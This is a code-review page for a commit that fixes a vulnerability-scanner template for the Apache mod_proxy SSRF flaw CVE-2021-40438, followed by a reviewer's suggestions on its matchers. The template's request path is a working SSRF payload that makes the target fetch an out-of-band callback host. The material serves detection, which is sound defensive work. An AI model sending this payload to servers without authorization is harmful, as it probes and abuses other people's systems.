Fix CVE-2021-40438.yaml

The current implementation of the vulnerability check does not detect vulnerable servers.
This PR uses a randomised interactsh hostname and checks the response headers for X-Interactsh-Version.
gtrrnr 2024-03-08 08:45:43 +03:00 committed by GitHub
parent 7f071a1f5a
commit 96ce225bc1
1 changed files with 4 additions and 7 deletions


@ -21,7 +21,7 @@ info:
epss-percentile: 0.99749 epss-percentile: 0.99749
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
metadata: metadata:
max-request: 2 max-request: 1
vendor: apache vendor: apache
product: http_server product: http_server
tags: cve2021,cve,ssrf,apache,mod-proxy,kev tags: cve2021,cve,ssrf,apache,mod-proxy,kev
@ -29,15 +29,12 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{randbase(5)}}.com/' - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}/'
- '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://oast.pro/'
host-redirects: true host-redirects: true
max-redirects: 2 max-redirects: 2
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- "!contains(body_1, '<h1> Interactsh Server </h1>')" - contains(header_1, "X-Interactsh-Version")
- "contains(body_2, '<h1> Interactsh Server </h1>')"
condition: and
# digest: 4a0a00473045022054595b49ba72d99512a0d6ea2cb09a8a9b17077a63d51b94d79025a970c5e470022100b3a313e154e44c770642e0e8874fb62257de71ab53059714c607ec9d2c13a4ed:922c64590222798bb761d5b6d8e72950
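Review bot: The new matcher under `dsl:` depends on the upstream interactsh response, including its `X-Interactsh-Version` header, surviving the round trip through the target's reverse proxy unmodified; a proxy that strips or rewrites upstream headers would make this check miss a server that did reach the callback host. Since the request now uses `{{interactsh-url}}`, the out-of-band confirmation is already available to the template and is the more reliable signal: add `- contains(interactsh_protocol, "http")` under `dsl:` and `condition: or` below it, so either the reflected header or the recorded callback confirms the finding. The `# digest:` line appears to be a signature over the template content, and I cannot tell from this page whether the one shown was regenerated after the edit, so confirm it matches the new body before merge. For consistency with the removed lines, quote the DSL expression as the rest of the file does (`- 'contains(header_1, "X-Interactsh-Version")'`).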